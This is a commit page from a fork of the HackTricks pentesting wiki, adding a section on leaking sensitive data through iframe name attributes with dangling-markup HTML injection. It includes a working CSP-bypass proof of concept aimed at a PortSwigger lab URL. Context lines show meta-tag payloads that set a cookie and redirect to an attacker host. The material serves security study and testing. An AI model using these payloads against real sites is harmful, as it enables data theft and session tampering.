coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [#3307] No subject

Browse Source
This commit is contained in:
CPol 2022-07-04 10:37:21 +00:00 committed by gitbook-bot
parent b1dfcc0701
commit 48b89e1c52
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
pentesting-web/dangling-markup-html-scriptless-injection.md
View File

@ -221,6 +221,21 @@ Notice that a **child document can view and set location property for parent, ev
This can be mitigated with something like: _**sandbox= allow-scripts allow-top-navigation**_
An iframe can also be abused to leak sensitive information from a different page **using the iframe name attribute**. This is because you can create an iframe that iframes itself abusing the HTML injection that makes the **sensitive info appear inside the iframe name attribute** and then access that name from the initial iframe and leak it.
```html
<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>
<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
```
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
### \<meta abuse
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`